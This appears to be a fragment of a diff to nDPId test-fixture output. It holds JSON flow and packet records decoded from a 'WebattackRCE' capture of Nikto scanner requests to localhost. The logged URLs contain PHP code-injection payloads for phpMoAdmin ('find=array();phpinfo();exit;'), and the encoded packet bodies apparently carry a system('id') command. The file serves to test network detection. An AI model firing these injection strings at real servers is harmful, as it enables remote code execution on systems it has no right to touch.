00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_packet_id":1,"flow_last_seen":1576420277975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277975,"pkt":"AAAAAAAAAAAAAAAACABFAAFkoPRAAEAGmp1\/AAABfwAAAcfSH5BFc5mo+BaB54AYAED\/WAAAAQEICp1m\/\/+dZv\/\/R0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_packet_id":1,"flow_last_seen":1576420277976,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277976,"pkt":"AAAAAAAAAAAAAAAACABFAAFfD0hAAEAGLE9\/AAABfwAAAcfUH5ChoTYRo2DY7oAYAED\/UwAAAQEICp1nAACdZwAAR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":1,"flow_last_seen":1576420277977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277977,"pkt":"AAAAAAAAAAAAAAAACABFAAFqZD5AAEAG101\/AAABfwAAAcfWH5DMOF1rGOgpBIAYAED\/XgAAAQEICp1nAAGdZwABR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_packet_id":1,"flow_last_seen":1576420277980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277980,"pkt":"AAAAAAAAAAAAAAAACABFAAFqHXJAAEAGHhp\/AAABfwAAAcfYH5AZXiQoPHeXDoAYAED\/XgAAAQEICp1nAASdZwAER0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_packet_id":1,"flow_last_seen":1576420277981,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277981,"pkt":"AAAAAAAAAAAAAAAACABFAAFn7phAAEAGTPZ\/AAABfwAAAcfaH5CzPtfCPnznp4AYAED\/WwAAAQEICp1nAAWdZwAFR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_packet_id":1,"flow_last_seen":1576420277983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277983,"pkt":"AAAAAAAAAAAAAAAACABFAAFcKzdAAEAGEGN\/AAABfwAAAcfcH5CIchJjnARiwIAYAED\/UAAAAQEICp1nAAedZwAHR0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_packet_id":1,"flow_last_seen":1576420277984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277984,"pkt":"AAAAAAAAAAAAAAAACABFAAFfNJZAAEAGBwF\/AAABfwAAAcfeH5DptA3NjIJEK4AYAED\/UwAAAQEICp1nAAidZwAIR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 